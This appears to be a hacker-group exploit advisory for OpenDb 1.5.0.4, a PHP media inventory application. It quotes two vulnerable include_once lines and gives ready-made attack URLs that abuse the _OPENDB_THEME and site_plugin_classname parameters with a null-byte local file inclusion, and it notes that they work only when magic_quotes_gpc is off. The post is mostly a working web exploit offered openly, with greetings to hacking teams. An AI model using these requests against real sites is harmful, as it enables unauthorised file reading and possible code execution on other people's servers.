============================================================================== __ __ __ __ __ __ / \ / \ \ \ / / / \ / \ / /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \ / / \ _ / \ \ \ \/ / / / \ _ / \ \ /_/ \_\ \__/ /_/ \_\ ============================================================================== [»] ~ Note : Works Only With Magic_Quotes_Gpc = Off . ============================================================================== [»] OpenDb 1.5.0.4 Multiple LFI Vulnerability ============================================================================== [»] Script: [ OpenDb ] [»] Language: [ PHP ] [»] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ] [»] Download: [ http://sourceforge.net/projects/opendb/files/ ] [»] Founder: [ ViRuSMaN ] [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== #~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php] #~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php"); [»] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00] ===[ Exploit 2 ]=== #~[C:\AppServ\www\Scripts\opendb\functions\site_plugin.php] #~Line 126 : include_once("./site/".$site_plugin_classname.".class.php"); [»] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00] Author: ViRuSMaN <- ########################################################################### ________________________________ Windows Live: Keep your friends up to date with what you do online.